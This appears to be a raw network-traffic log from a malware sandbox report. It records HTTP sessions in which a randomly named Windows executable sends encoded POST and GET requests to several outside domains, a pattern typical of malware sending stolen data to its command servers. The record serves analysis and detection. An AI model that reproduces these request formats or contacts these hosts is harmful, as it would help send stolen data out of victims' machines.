BoLdSho/pQKb6EFsEotK8RmdMQ7gXapQwNS/IlMAq94d5omHHP1FUeR1WeHUzJRBm6TV7ckO5NYUJcdKq7jXBdt+sZrElBLM84W/RU4JrDtwStTwaGNwPWYVXgNa6oxiM4VPjZvYTLWCG7LxuQIroD7cr4xB6RHHgd2SDfrra3xP0fdzyqsvrgQW5uJw4GqTVk9L50bPvxdzrJVKuIQ8YaBb0J12eDO8Bo7wP3oHWPhkcd7JDFjuV1POrd17hF64WkEK5HJumbn [TRUNCATED]


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  21192.168.2.449763116.213.43.190802844C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  TimestampBytes transferredDirectionData
                  Jul 4, 2024 03:12:43.659425020 CEST496OUTGET /l8a4/?n02X2xPX=CPL7YN3vcnDyuUFtA6pv3uMhLFbLrJb1JE9LZisFmiEQ0vYrwOGtj9QBvlTfLzXcbjIACE/TYt0vO88JJ7+OI7LCsTQn12dDmlA0tsWVEcE74AqN9n1fFjE=&XHUPe=Ud3TZHA0-F74ZZ HTTP/1.1
                  Host: www.augaqfp.lol
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  22192.168.2.44976413.248.169.48802844C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  TimestampBytes transferredDirectionData
                  Jul 4, 2024 03:13:10.075815916 CEST768OUTPOST /cns4/ HTTP/1.1
                  Host: www.webuyfontana.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.webuyfontana.com
                  Referer: http://www.webuyfontana.com/cns4/
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 205
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Data Raw: 6e 30 32 58 32 78 50 58 3d 57 38 2f 64 45 62 75 59 48 33 38 35 6b 75 78 6b 49 55 4c 77 63 63 54 77 72 69 50 34 45 44 63 53 71 44 4f 43 61 6c 4d 62 43 79 4d 6a 35 42 45 54 73 65 4b 61 66 43 35 49 70 65 32 44 78 55 35 37 53 77 34 4b 48 53 63 4f 37 66 34 62 6b 38 76 6a 44 63 71 42 49 41 4c 48 43 4c 69 67 61 4a 39 54 55 6a 47 2f 2b 7a 31 49 4e 64 7a 64 4a 31 53 6d 6b 47 5a 79 42 46 47 50 57 37 62 55 2b 55 31 2f 78 4f 35 34 54 33 77 57 65 6e 38 6d 51 6f 6c 56 35 48 54 4b 47 42 62 4c 57 72 47 7a 50 38 41 6f 30 68 41 6c 4a 74 57 41 49 39 67 31 50 5a 76 70 41 54 62 52 71 30 73 79 66 46 36 6f 7a 59 58 39 61 67 3d 3d
                  Data Ascii: n02X2xPX=W8/dEbuYH385kuxkIULwccTwriP4EDcSqDOCalMbCyMj5BETseKafC5Ipe2DxU57Sw4KHScO7f4bk8vjDcqBIALHCLigaJ9TUjG/+z1INdzdJ1SmkGZyBFGPW7bU+U1/xO54T3wWen8mQolV5HTKGBbLWrGzP8Ao0hAlJtWAI9g1PZvpATbRq0syfF6ozYX9ag==


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  23192.168.2.44976513.248.169.48802844C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  TimestampBytes transferredDirectionData
                  Jul 4, 2024 03:13:12.602462053 CEST788OUTPOST /cns4/ HTTP/1.1
                  Host: www.webuyfontana.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.webuyfontana.com
                  Referer: http://www.webuyfontana.com/cns4/
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 225
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Data Raw: 6e 30 32 58 32 78 50 58 3d 57 38 2f 64 45 62 75 59 48 33 38 35 6b 4e 5a 6b 45 58 6a 77 58 63 54 33 68 43 50 34 4f 6a 63 57 71 44 43 43 61 67 67 4c 43 41 6f 6a 36 67 30 54 76 62 32 61 59 43 35 49 78 75 32 4b 76 6b 35 47 53 77 6b 6f 48 57 63 4f 37 66 73 62 6b 35 72 6a 43 74 71 43 4a 51 4c 46 62 62 69 69 55 70 39 54 55 6a 47 2f 2b 7a 68 79 4e 5a 6e 64 4a 47 36 6d 6c 69 46 78 4c 6c 47 4d 47 4c 62 55 30 30 31 37 78 4f 35 57 54 30 30 77 65 68 77 6d 51 74 5a 56 34 56 37 4c 50 42 62 4a 5a 4c 48 67 4a 75 77 6c 31 7a 78 49 42 63 33 37 4f 65 4d 55 44 2f 2b 7a 52 69 36 47 34 30 49 42 43 43 7a 63 2b 62 71 30 42 75 43 47 2f 4e 39 47 62 42 63 5a 67 52 52 56 49 35 59 6f 31 77 34 3d
                  Data Ascii: n02X2xPX=W8/dEbuYH385kNZkEXjwXcT3hCP4OjcWqDCCaggLCAoj6g0Tvb2aYC5Ixu2Kvk5GSwkoHWcO7fsbk5rjCtqCJQLFbbiiUp9TUjG/+zhyNZndJG6mliFxLlGMGLbU0017xO5WT00wehwmQtZV4V7LPBbJZLHgJuwl1zxIBc37OeMUD/+zRi6G40IBCCzc+bq0BuCG/N9GbBcZgRRVI5Yo1w4=


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  24192.168.2.44976613.248.169.48802844C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  TimestampBytes transferredDirectionData
                  Jul 4, 2024 03:13:15.132055044 CEST10870OUTPOST /cns4/ HTTP/1.1
                  Host: www.webuyfontana.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.webuyfontana.com
                  Referer: http://www.webuyfontana.com/cns4/
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 10305
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Data Raw: 6e 30 32 58 32 78 50 58 3d 57 38 2f 64 45 62 75 59 48 33 38 35 6b 4e 5a 6b 45 58 6a 77 58 63 54 33 68 43 50 34 4f 6a 63 57 71 44 43 43 61 67 67 4c 43 41 67 6a 35 53 38 54 76 38 69 61 5a 43 35 49 38 4f 32 50 76 6b 35 68 53 77 73 73 48 57 5a 7a 37 64 55 62 6c 66 58 6a 58 70 2b 43 43 51 4c 46 47 4c 69 6e 61 4a 38 54 55 6a 32 6a 2b 7a 78 79 4e 5a 6e 64 4a 41 47 6d 73 57 5a 78 59 31 47 50 57 37 62 41 2b 55 30 63 78 4f 78 67 54 31 41 47 64 52 51 6d 52 4e 70 56 37 6d 54 4c 41 42 62 48 63 4c 47 6e 4a 75 39 6c 31 7a 39 71 42 63 43 7a 4f 64 51 55 41 70 66 6f 44 79 76 59 6c 31 67 44 5a 77 62 4a 6e 38 4b 7a 46 63 72 2f 33 39 56 54 48 53 63 6e 36 52 34 4f 51 4b 34 6a 6d 57 54 56 2b 4b 59 6f 64 57 6d 61 64 51 65 6d 6a 34 77 56 63 46 56 78 6e 68 2f 6e 6f 6e 4f 55 62 34 6e 55 66 56 30 41 5a 6d 76 79 57 66 38 58 35 67 54 69 4e 79 66 5a 52 44 54 53 2b 67 33 31 61 59 4a 78 6b 53 4c 45 30 38 78 4a 53 38 72 53 65 66 75 4b 75 4b 54 2f 59 4f 54 48 7a 74 32 44 4e 31 4f 70 31 41 4a 2b 59 4e 73 30 4c 4d 5a 4a 38 52 45 6a 71 [TRUNCATED]
                  Data Ascii: n02X2xPX=W8/dEbuYH385kNZkEXjwXcT3hCP4OjcWqDCCaggLCAgj5S8Tv8iaZC5I8O2Pvk5hSwssHWZz7dUblfXjXp+CCQLFGLinaJ8TUj2j+zxyNZndJAGmsWZxY1GPW7bA+U0cxOxgT1AGdRQmRNpV7mTLABbHcLGnJu9l1z9qBcCzOdQUApfoDyvYl1gDZwbJn8KzFcr/39VTHScn6R4OQK4jmWTV+KYodWmadQemj4wVcFVxnh/nonOUb4nUfV0AZmvyWf8X5gTiNyfZRDTS+g31aYJxkSLE08xJS8rSefuKuKT/YOTHzt2DN1Op1AJ+YNs0LMZJ8REjqOEkkvQg2Hax0fSF+unUN3Jya3nu0lHpccAARnQ7MzjYhxQifzmOvR+Q73v0ne5ozHhWdtWzKSTZWBIuJ1c8v7ng2F5CjhoCI4wlXQSvJ+jmcc5Xh6OBm6BLUr5B7sfOFvy6OsmuIlAYyIL4UccekEHaSu+iwG0SqZD4+OUKCeGQ2fSPIp3iqCkJIgVaDvhjQcrZYs3xOwiHtYeZj95brUZ/jg+D9ktHjQRExFjqY1RFvegEm9ezZqrvVGSU/k0wDNErZzTo53K/UWRzXFCjMfXXq3VTI1+/xFZbcU+vRgsK2I8ty9eAR0thSyzxwCV4Jz0yXf08FDjf5nOb0rbdCJweoe9fRZC78L5Hpxiy6q518Fgvha4e/ZOHWqSMDHEWKnxfOOCpwBYG/44tVdwafk9I2KWzzHT+w318UQKwzTTOT7Gyph5VY5ySsLjIr4DpsDYx3R9n04ua4gFPOcH4kWbL9uNJyVk4etqK8WU7S7M0eMCCwydQM158WMS0YhVMNqwHXBSX4CXNxce67oH8Ff9n1ii5YQscfZ0R8hyoqk6F/7IU5rQUzwNqSoeeEodhXpNhua6Np5sfScBESiIf4guh8EtCcCjC0V0WtX9esIk7evgCleOIkn36CduAyhafoWc5klJdWQNPBkzpG1BUtCXOeyrAbvgNmE2 [TRUNCATED]


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  25192.168.2.44976713.248.169.48802844C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  TimestampBytes transferredDirectionData
                  Jul 4, 2024 03:13:17.664186954 CEST501OUTGET /cns4/?XHUPe=Ud3TZHA0-F74ZZ&n02X2xPX=b+X9HsydX2EZhoFbHWDGWLn8qSDjJiBvgg2FVhcLABkhzzs0ucmBPDMRqtKe3XUMFDw5FS9Ji9Imkcb4M+SgV1CrLIKWT8R/LC2e+AlJEb/hHwO3uGNSJEs= HTTP/1.1
                  Host: www.webuyfontana.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Jul 4, 2024 03:13:18.146694899 CEST405INHTTP/1.1 200 OK
                  Server: openresty
                  Date: Thu, 04 Jul 2024 01:13:18 GMT
                  Content-Type: text/html
                  Content-Length: 265
                  Connection: close
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 58 48 55 50 65 3d 55 64 33 54 5a 48 41 30 2d 46 37 34 5a 5a 26 6e 30 32 58 32 78 50 58 3d 62 2b 58 39 48 73 79 64 58 32 45 5a 68 6f 46 62 48 57 44 47 57 4c 6e 38 71 53 44 6a 4a 69 42 76 67 67 32 46 56 68 63 4c 41 42 6b 68 7a 7a 73 30 75 63 6d 42 50 44 4d 52 71 74 4b 65 33 58 55 4d 46 44 77 35 46 53 39 4a 69 39 49 6d 6b 63 62 34 4d 2b 53 67 56 31 43 72 4c 49 4b 57 54 38 52 2f 4c 43 32 65 2b 41 6c 4a 45 62 2f 68 48 77 4f 33 75 47 4e 53 4a 45 73 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?XHUPe=Ud3TZHA0-F74ZZ&n02X2xPX=b+X9HsydX2EZhoFbHWDGWLn8qSDjJiBvgg2FVhcLABkhzzs0ucmBPDMRqtKe3XUMFDw5FS9Ji9Imkcb4M+SgV1CrLIKWT8R/LC2e+AlJEb/hHwO3uGNSJEs="}</script></head></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  26192.168.2.44976838.47.232.224802844C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  TimestampBytes transferredDirectionData
                  Jul 4, 2024 03:13:23.294795990 CEST744OUTPOST /rmef/ HTTP/1.1
                  Host: www.ytw6.top
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.ytw6.top
                  Referer: http://www.ytw6.top/rmef/
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 205
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Data Raw: 6e 30 32 58 32 78 50 58 3d 5a 66 67 5a 4f 5a 59 44 4e 2f 71 45 7a 33 47 33 52 31 55 31 48 38 35 74 41 2b 78 54 58 68 2b 7a 2b 71 56 51 71 73 6f 4e 33 53 36 72 41 48 48 2f 56 69 4c 6c 59 49 4d 35 4b 35 2b 35 4f 4d 39 2b 4b 56 2b 44 71 73 6a 72 70 69 7a 56 58 44 36 77 35 53 70 52 59 51 67 73 38 54 53 76 42 2b 47 46 35 49 78 6c 6e 5a 6a 64 58 74 4a 62 2f 43 37 5a 2b 63 62 41 39 62 2b 7a 69 6c 76 64 62 6c 41 43 4f 6a 56 6b 4f 32 51 79 46 6a 36 67 4c 32 4b 69 2f 66 35 63 46 62 55 54 47 4f 75 72 67 75 52 78 47 73 6e 44 59 69 78 48 54 54 37 64 4f 32 70 42 36 52 33 71 42 4a 53 53 47 53 48 4e 64 49 34 47 48 77 3d 3d
                  Data Ascii: n02X2xPX=ZfgZOZYDN/qEz3G3R1U1H85tA+xTXh+z+qVQqsoN3S6rAHH/ViLlYIM5K5+5OM9+KV+DqsjrpizVXD6w5SpRYQgs8TSvB+GF5IxlnZjdXtJb/C7Z+cbA9b+zilvdblACOjVkO2QyFj6gL2Ki/f5cFbUTGOurguRxGsnDYixHTT7dO2pB6R3qBJSSGSHNdI4GHw==
                  Jul 4, 2024 03:13:24.179734945 CEST691INHTTP/1.1 404 Not Found
                  Server: nginx
                  Date: Thu, 04 Jul 2024 01:13:24 GMT
                  Content-Type: text/html
                  Content-Length: 548
                  Connection: close
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  27192.168.2.44976938.47.232.224802844C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  TimestampBytes transferredDirectionData
                  Jul 4, 2024 03:13:25.838396072 CEST764OUTPOST /rmef/ HTTP/1.1
                  Host: www.ytw6.top
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.ytw6.top
                  Referer: http://www.ytw6.top/rmef/
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 225
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Data Raw: 6e 30 32 58 32 78 50 58 3d 5a 66 67 5a 4f 5a 59 44 4e 2f 71 45 31 58 32 33 54 53 6f 31 57 73 35 75 4d 65 78 54 4f 78 2b 76 2b 71 52 51 71 74 73 6e 33 68 65 72 41 6e 33 2f 45 57 66 6c 4e 49 4d 35 65 70 2b 6c 41 73 39 68 4b 56 43 4c 71 75 48 72 70 69 58 56 58 42 69 77 35 6a 70 53 59 41 67 71 33 7a 53 74 4d 65 47 46 35 49 78 6c 6e 5a 6e 37 58 73 68 62 2b 33 7a 5a 76 4e 62 42 68 4c 2b 38 68 6c 76 64 4d 31 41 47 4f 6a 56 61 4f 79 59 4d 46 6e 4b 67 4c 33 57 69 2f 4e 42 64 65 4c 56 57 49 75 76 69 68 38 6b 56 4f 75 69 32 61 46 5a 72 65 54 72 51 4c 77 34 62 72 67 57 39 54 4a 32 68 62 56 4f 35 51 4c 46 50 63 38 45 38 43 69 61 75 4e 70 49 32 2b 41 39 4b 2b 55 48 44 36 63 30 3d
                  Data Ascii: n02X2xPX=ZfgZOZYDN/qE1X23TSo1Ws5uMexTOx+v+qRQqtsn3herAn3/EWflNIM5ep+lAs9hKVCLquHrpiXVXBiw5jpSYAgq3zStMeGF5IxlnZn7Xshb+3zZvNbBhL+8hlvdM1AGOjVaOyYMFnKgL3Wi/NBdeLVWIuvih8kVOui2aFZreTrQLw4brgW9TJ2hbVO5QLFPc8E8CiauNpI2+A9K+UHD6c0=
                  Jul 4, 2024 03:13:26.743859053 CEST691INHTTP/1.1 404 Not Found
                  Server: nginx
                  Date: Thu, 04 Jul 2024 01:13:26 GMT
                  Content-Type: text/html
                  Content-Length: 548
                  Connection: close
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  28192.168.2.44977038.47.232.224802844C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
                  TimestampBytes transferredDirectionData
                  Jul 4, 2024 03:13:28.367280006 CEST10846OUTPOST /rmef/ HTTP/1.1
                  Host: www.ytw6.top
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                  Accept-Language: en-US
                  Accept-Encoding: gzip, deflate, br
                  Origin: http://www.ytw6.top
                  Referer: http://www.ytw6.top/rmef/
                  Cache-Control: no-cache
                  Content-Type: application/x-www-form-urlencoded
                  Content-Length: 10305
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                  Data Raw: 6e 30 32 58 32 78 50 58 3d 5a 66 67 5a 4f 5a 59 44 4e 2f 71 45 31 58 32 33 54 53 6f 31 57 73 35 75 4d 65 78 54 4f 78 2b 76 2b 71 52 51 71 74 73 6e 33 68 57 72 42 55 50 2f 56 45 33 6c 66 34 4d 35 43 5a 2b 6d 41 73 38 37 4b 56 61 50 71 75 4c 52 70 67 66 56 59 43 71 77 2f 52 42 53 4c 67 67 71 71 6a 53 73 42 2b 47 71 35 49 67 74 6e 59 58 37 58 73 68 62 2b 32 44 5a 76 63 62 42 78 37 2b 7a 69 6c 76 61 62 6c 41 2b 4f 69 38 68 4f 79 56 35 46 55 43 67 46 7a 32 69 36 34 56 64 44 62 56 55 4c 75 76 36 68 38 34 4b 4f 75 2f 4a 61 41 6c 46 65 52 33 51 4c 45 4e 38 30 42 75 53 47 35 69 6a 4f 46 36 4a 66 71 78 4c 51 74 41 62 4a 79 32 68 52 62 49 34 2f 77 51 63 69 6d 6a 6d 35 4d 31 78 67 61 76 50 57 66 52 54 2b 38 53 75 70 41 41 4a 30 61 4c 78 73 32 65 57 5a 78 55 64 73 4a 63 4c 6e 38 78 76 73 77 45 67 58 7a 77 33 48 72 4c 52 6b 58 46 66 45 73 54 34 70 68 72 66 64 50 58 4b 69 7a 49 72 46 35 4b 6a 69 6d 57 63 50 2f 2f 50 64 46 2b 6a 46 4b 35 34 37 65 2f 38 55 51 58 6b 57 76 52 5a 30 58 34 74 6b 6b 6c 38 64 63 50 45 56 [TRUNCATED]
                  Data Ascii: n02X2xPX=ZfgZOZYDN/qE1X23TSo1Ws5uMexTOx+v+qRQqtsn3hWrBUP/VE3lf4M5CZ+mAs87KVaPquLRpgfVYCqw/RBSLggqqjSsB+Gq5IgtnYX7Xshb+2DZvcbBx7+zilvablA+Oi8hOyV5FUCgFz2i64VdDbVULuv6h84KOu/JaAlFeR3QLEN80BuSG5ijOF6JfqxLQtAbJy2hRbI4/wQcimjm5M1xgavPWfRT+8SupAAJ0aLxs2eWZxUdsJcLn8xvswEgXzw3HrLRkXFfEsT4phrfdPXKizIrF5KjimWcP//PdF+jFK547e/8UQXkWvRZ0X4tkkl8dcPEVfM0fWVv6DvYriqmdhrPXWC1QJI9tYNUSfOHaEAaJiIvcI7k3S0Z8ERGa0855MrXLqxzhueI3TNf+L5ak26XqQ6C1HLOviA0+gptvuKBr5TvdzUb3y5U0fss/zyrP4HslrKtop+TfUQwwkEzbwEzS42j2Uv8N7ofk4X9tQvFZ559XFQFdF4Ft3gy0MJzTJcZ8vDWPNYVSpanfw2o8zjKK/39nO3W+TQb825tVqJihfnu1gpCs0XswdV6s5jLNcs9nJI18ojZ14NuoiM1cMvGWYQrD0jfaVPmD3P0pboz4fsFo6n4xRtwdoj7kiBDcuEw/FV+hzvXTlHETwIJ60XHUgBbyXk2TGiHRQS1qAPufj737quvs304+boP0Mc4enYIzrzGzzQUBnrz5Nk1Roz+HxBs41VZVCsKwaBA8TS1kDnr5dyb2J5Hog/TbVulW3b8IEssXEql2GNh955ZbEOsMf6geLqoWyFlQkkEPlcTqvuSuRNQ2QtcakzTmzYN+iWzF8T01aakYqiRaYbnSwxKmr5by5MD2BX5dVfHwUR1v1teVRIuLaQjwOCCz5uUM3r6vbjMCbOyodvLY/P1ZD8bllgE2HtvNqOHduoj5oT/kFVGZYJDOvG6TmDJL+KhlNdVUXOTLFLEgLbxKgpy6l+FsbQSH9OnAOrVGoZ [TRUNCATED]
                  Jul 4, 2024 03:13:29.279330015 CEST691INHTTP/1.1 404 Not Found
                  Server: nginx
                  Date: Thu, 04 Jul 2024 01:13:29 GMT
                  Content-Type: text/html
                  Content-Length: 548
                  Connection: close
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
